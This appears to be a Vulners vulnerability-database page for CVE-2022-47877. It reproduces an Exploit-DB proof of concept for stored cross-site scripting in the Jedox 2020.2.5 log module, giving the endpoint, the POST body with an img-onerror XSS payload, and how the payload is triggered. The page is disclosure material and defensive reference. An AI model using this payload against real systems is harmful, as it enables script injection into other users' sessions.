| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module Vulnerability | 5 May 202300:00 | – | zdt | |
| CVE-2022-47877 | 3 May 202300:30 | – | circl | |
| Jedox 跨站脚本漏洞 | 2 May 202300:00 | – | cnnvd | |
| CVE-2022-47877 | 2 May 202300:00 | – | cve | |
| CVE-2022-47877 | 2 May 202300:00 | – | cvelist | |
| Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module | 5 May 202300:00 | – | exploitdb | |
| EUVD-2022-50634 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-47877 | 2 May 202320:15 | – | nvd | |
| Cross site scripting | 2 May 202320:15 | – | prion | |
| PT-2023-15509 · Jedox · Jedox | 2 May 202300:00 | – | ptsecurity |
`# Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47877
Introduction
=================
A Stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) Store log entry with XSS payload:
PATH: /ub/ccmd
METHOD: POST
BODY:
[
[
"log",
"error",
"<img src=# onerror=\"alert('XSS')\">"
]
]
2) Trigger XSS payload by opening the Logs page and showing the respective log entry.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation